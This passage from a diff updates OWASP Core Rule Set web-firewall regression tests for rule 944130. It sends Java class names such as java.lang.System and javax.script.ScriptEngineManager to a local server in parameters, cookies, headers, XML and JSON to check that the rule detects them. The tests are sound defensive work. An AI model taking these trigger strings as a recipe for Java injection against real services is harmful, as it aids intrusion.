- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-372 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-373 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-374 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-375 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-376 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-377 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log: + expect_ids: [944130] + - test_id: 377 desc: "Cookie test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-378 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-379 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-380 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-381 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-382 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-383 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-384 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-385 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log: + expect_ids: [944130] + - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-386 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-387 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-388 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log: + expect_ids: [944130] + - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-389 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-390 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-391 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-392 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-393 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-394 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-395 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-396 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log: + expect_ids: [944130] + - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-397 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-398 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-399 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log: + expect_ids: [944130] + - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 